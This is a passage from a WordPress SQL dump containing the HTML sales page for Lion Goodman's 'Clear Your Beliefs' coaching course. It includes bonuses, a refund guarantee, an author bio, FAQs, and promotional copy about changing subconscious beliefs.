BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:56:56', '2014-06-19 06:56:56', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1043, 2, '2014-06-19 01:49:40', '2014-06-19 06:49:40', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true 